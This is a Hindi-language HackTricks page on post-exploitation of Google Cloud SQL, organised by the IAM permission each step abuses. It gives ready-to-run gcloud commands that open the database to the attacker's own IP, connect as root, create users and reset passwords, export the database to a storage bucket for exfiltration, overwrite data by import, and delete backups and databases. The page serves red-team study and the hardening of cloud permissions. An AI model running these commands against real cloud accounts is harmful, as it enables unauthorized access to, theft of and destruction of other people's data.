GCP - Cloud SQL Post Exploitation

htARTE (HackTricks AWS Red Team Expert) के साथ जीरो से हीरो तक AWS हैकिंग सीखें htARTE (HackTricks AWS Red Team Expert)!

HackTricks का समर्थन करने के अन्य तरीके:

अगर आप अपनी कंपनी का विज्ञापन HackTricks में देखना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं तो सब्सक्रिप्शन प्लान्स देखें!
आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें
हमारे विशेष NFTs कलेक्शन, The PEASS Family खोजें
शामिल हों 💬 डिस्कॉर्ड समूह या टेलीग्राम समूह या हमें ट्विटर 🐦 @hacktricks_live** पर फॉलो करें।
हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके HackTricks और HackTricks Cloud github repos में।

क्लाउड SQL

क्लाउड SQL के बारे में अधिक जानकारी के लिए देखें:

pageGCP - Cloud SQL Enum

`cloudsql.instances.update`, ( `cloudsql.instances.get`)

डेटाबेस से कनेक्ट करने के लिए आपको बस डेटाबेस पोर्ट तक पहुंचने की आवश्यकता है और उपयोगकर्ता नाम और पासवर्ड पता होना चाहिए, कोई IAM आवश्यकताएं नहीं हैं। इसलिए, एक आसान तरीका तक पहुंचने के लिए, मानते हैं कि डेटाबेस का एक सार्वजनिक IP पता है, तो अनुमत नेटवर्क को अपडेट करें और अपने खुद के IP पते को एक्सेस करने की अनुमति दें।

# Use --assign-ip to make the database get a public IPv4
gcloud sql instances patch $INSTANCE_NAME \
--authorized-networks "$(curl ifconfig.me)" \
--assign-ip \
--quiet

mysql -h <ip_db> # If mysql

# With cloudsql.instances.get you can use gcloud directly
gcloud sql connect mysql --user=root --quiet

डेटाबेस की बैकअप्स को विघटित करने के लिए --no-backup का उपयोग भी संभव है।

क्योंकि ये आवश्यकताएं हैं, मैं पूरी तरह से निश्चित नहीं हूं कि cloudsql.instances.connect और cloudsql.instances.login के अनुमतियाँ क्या हैं। अगर आप इसे जानते हैं तो PR भेजें!

`cloudsql.users.list`

डेटाबेस के सभी उपयोगकर्ताओं की सूची प्राप्त करें:

gcloud sql users list --instance <intance-name>

`cloudsql.users.create`

यह अनुमति डेटाबेस के अंदर नए उपयोगकर्ता बनाने की अनुमति देती है:

gcloud sql users create <username> --instance <instance-name> --password <password>

`cloudsql.users.update`

यह अनुमति डेटाबेस के भीतर उपयोगकर्ता को **अपड

gcloud sql users set-password <username> --instance <instance-name> --password <password>

`cloudsql.instances.restoreBackup`, `cloudsql.backupRuns.get`

बैकअप में पुरानी संवेदनशील जानकारी हो सकती है, इसलिए उन्हें जांचना दिलचस्प हो सकता है। डेटाबेस में एक बैकअप को पुनर्स्थापित करें:

gcloud sql backups restore <backup-id> --restore-instance <instance-id>

`cloudsql.backupRuns.delete`

इस अनुमति से बैकअप को हटाया जा सकता है:

gcloud sql backups delete <backup-id> --instance <instance-id>

`cloudsql.instances.export`, `storage.objects.create`

डेटाबेस को निर्यात करें ताकि आप उसे वहां से एक्सेस कर सकें:

# Export sql format, it could also be csv and bak
gcloud sql export sql <instance-id> <gs://bucketName/fileName>

`cloudsql.instances.import`, `storage.objects.get`

डेटाबेस इम्पोर्ट (ओवरराइट) एक क्लाउड स्टोरेज बकेट से:

# Import format SQL, you could also import formats bak and csv
gcloud sql import sql <instance-id> <gs://bucketName/fileName>

`cloudsql.databases.delete`

डेटाबेस को डेटाबेस इंस्टेंस से हटाएं:

gcloud sql databases delete <db-name> --instance <instance-id>

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)!

दूसरे तरीके HackTricks का समर्थन करने के लिए:

अगर आप अपनी कंपनी का विज्ञापन HackTricks में देखना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं तो सब्सक्रिप्शन प्लान्स देखें!
आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें
हमारे विशेष NFTs कलेक्शन, The PEASS Family खोजें
शामिल हों 💬 Discord समूह या टेलीग्राम समूह या हमें ट्विटर 🐦 @hacktricks_live** पर फॉलो** करें।
अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके HackTricks और HackTricks Cloud github repos में।

PreviousGCP - Cloud Shell Post Exploitation NextGCP - Compute Post Exploitation

Last updated 3 months ago

क्लाउड SQL

cloudsql.instances.update, ( cloudsql.instances.get)

cloudsql.users.list

cloudsql.users.create

cloudsql.users.update

cloudsql.instances.restoreBackup, cloudsql.backupRuns.get

cloudsql.backupRuns.delete

cloudsql.instances.export, storage.objects.create

cloudsql.instances.import, storage.objects.get

cloudsql.databases.delete